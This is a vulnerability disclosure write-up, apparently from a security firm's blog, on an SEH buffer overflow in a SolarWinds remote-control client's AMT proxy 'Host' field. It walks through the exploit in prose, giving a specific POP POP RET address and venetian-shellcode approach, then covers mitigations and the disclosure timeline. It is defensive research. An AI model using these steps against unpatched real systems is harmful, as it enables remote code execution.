Below is a video demonstration of exploitation for proof of concept of this vulnerability.

Solarwinds have been contacted about this issue who have acknowledged it and have released a version which reportedly contains the fix for the vulnerability, version 12.1. However, at the time of writing, this version doesn’t appear to be available from the customer portal and if you are affected by this issue, it is recommended that you request it directly from customer support.

Method of Exploitation

One of the windows (AMT Settings) within in the GUI has several input fields. The majority of these fields lack appropriate input sanitization, leading to crashes when entering a large amount of input (more than 3,000 characters). However, for the proof of concept, only one of these fields was used; the “Host” field under the SOCKS Proxy Settings.

As a simple test for this vulnerability, a large number of characters can be entered into the field to observe the results. Sometimes it may be necessary to fuzz input fields and parameters, an automated process of entering varying amounts of different characters in sequence in an attempt to identify unexpected behaviour, however this was not the case in this instance. Simply using a large number of A’s (over 2000) or any other character would result in the application terminating unexpectedly.

Looking at this process in a debugger, it becomes clear what is happening. The input is being written to the stack and has overflown the SEH addresses. This is quickly visible by looking at the SEH chain in the debugger.

Following this process through, eventually we can see our A’s (0x41) being placed into EIP due to the corrupted SEH chain.

Interestingly though, the A’s aren’t displayed how they were entered and have been separated by null bytes (0x00). This is because the input buffer is processed as wide characters, with UTF-16 encoding. From here, the next step is to determine how many bytes are required before the overwrite happens and to find a suitable set of “POP, POP, RET” instructions. The buffer length before the overflow was identified using Metasploit’s helpful “pattern_create” and “pattern_offset” utilities, taking care to observe the bytes surrounding the overflow as the null bytes have to be discounted. As the DWRCC.EXE (main executable) is not being rebased on each execution, the instruction set found at address “0x00439D7D” was chosen. The executable was compiled without common protections, including ASLR which would have made hardcoding an address in the shellcode infeasible.

The next step is to overwrite the SEH and next SEH addresses with the address of the instruction found above and the op codes for a small jump over that address. Once executed, the execution flow should be then directed into the area of memory on the stack under our control. For both the address and the jump, UTF-16 characters were used so to avoid the null bytes. The payload looks like this at this point (most of the ‘A’s have been cropped for readability).

By placing a breakpoint on the first address of our “POP, POP, RET” instruction set, we can pause execution to step through and check everything is working as intended.

The breakpoint was hit which is the first hurdle down, now we just need to make sure it returns back and executes the jump instruction.

Great, so the jump was taken and we are now executing in a controllable area of memory. This is good news! The next step is to increase the padding and place some shellcode. Due to the wide characters, the shellcode to be used will need to be UTF-16 compatible. Luckily the alpha2 encoder in Metasploit has the ability to generate UTF-16 compatible shellcode. However, the one caveat is that it requires that a register holds the address of the beginning of the shellcode when the shellcode is executed. To achieve this, an offset would need to be calculated from an address which is unchanging on each runtime independent of the operating system version.

After taking into account the offset, the calculated value could then be placed into EAX right before the shellcode executes. To do this, a technique known as “venetian shellcode” could be used to execute operations in between the null bytes to get EAX to hold the required address. For this to work, the null bytes must be consumed by other harmless operations. This concept was new to me and so I thought I would give it a go here to see how it works using the simplest form of venetian shellcode There are some fantastic write-ups which discuss this technique and its history including Corelan’s tutorials and Fuzzysecurity (you can find links to both at the bottom of this post). Thanks for all your awesome work, guys! After combining everything together, we now have the following:

I won’t go into too much detail about how it all works here but if you are interested, you should be able to get an evaluation copy of the software easily enough to have a go yourself! I’m sure there are many other ways to approach this (probably more elegant ways too!).

Finally, we can copy and paste in the constructed payload both inside and outside of the debugger to see what happens.

Several different mitigations for buffer overflows exist which can be implemented during compilation. In some situations, they can be bypassed but they still offer an added layer of protection to help prevent or increase the complexity required for exploitation of buffer overflows. These are not new and have been around for a good while now, its 2018 and yet still many applications are being compiled without these protections.

32 bit vs 64 bit

Due to the differences in the way that exceptions are handled between 32-bit and 64-bit applications, only the 32-bit version appears to be exploitable to run arbitrary code. The 64-bit version can be overflowed which will lead to a crash but there wouldn’t be any benefit in doing this from an attacking perspective.

Windows has some inbuilt protections which, when enabled, can help protect the end user from SEH based buffer overflow attacks. One of these, known as SEHOP (Structured Exception Handler Overflow Protection), enforces an integrity check of the SEH chain before permitting execution. It does this by creating a symbolic record at the end of the records and, at the point when an exception is raised, it checks to make sure that this is still present, thereby determining the integrity of the chain. If the integrity has been impaired, it will safely terminate the process. SEHOP can be enabled via Group Policy settings.

An older protection mechanism known as SAFESEH, can be set via a compilation flag. This works by comparing a table of known safe exception handler addresses with those in the chain before jumping to them. However, this technique has some downsides, one being including the requirement to recompile binaries with this flag to benefit from its protection.

A personal note

Having recently passed my OSCE exam (which was an amazing experience and I fully recommend), I was looking to find something I could use my new found skill set to practise on. Finding this (while not the most exciting) was certainly rewarding and taught me some additional techniques that I may not have otherwise come across. However, the teaching was done by security professionals who have written some insanely useful and easy to follow tutorials. I want to extend a big personal thank you to all who spend their time writing these tutorials and guides. Two of the guides I used for Venetian Shellcode can be found below but the entire set of guides are invaluable for exploit development.

Disclosure Process

  • 15 June 2018 – Reported vulnerability to Solarwinds
  • 25 June 2018 – Update from Solarwinds that development team would be in further contact
  • 05 July 2018 – Contacted Solarwinds again to see if there had been any updates
  • 06 August 2018 – Requested update, vendor acknowledged the vulnerability and reported that remediation work was underway
  • 13 August 2018 – Vendor contacts Nettitude to inform them that version 12.1 has been released which contains a fix for the reported issue.
  • 06 September 2018 – Public disclosure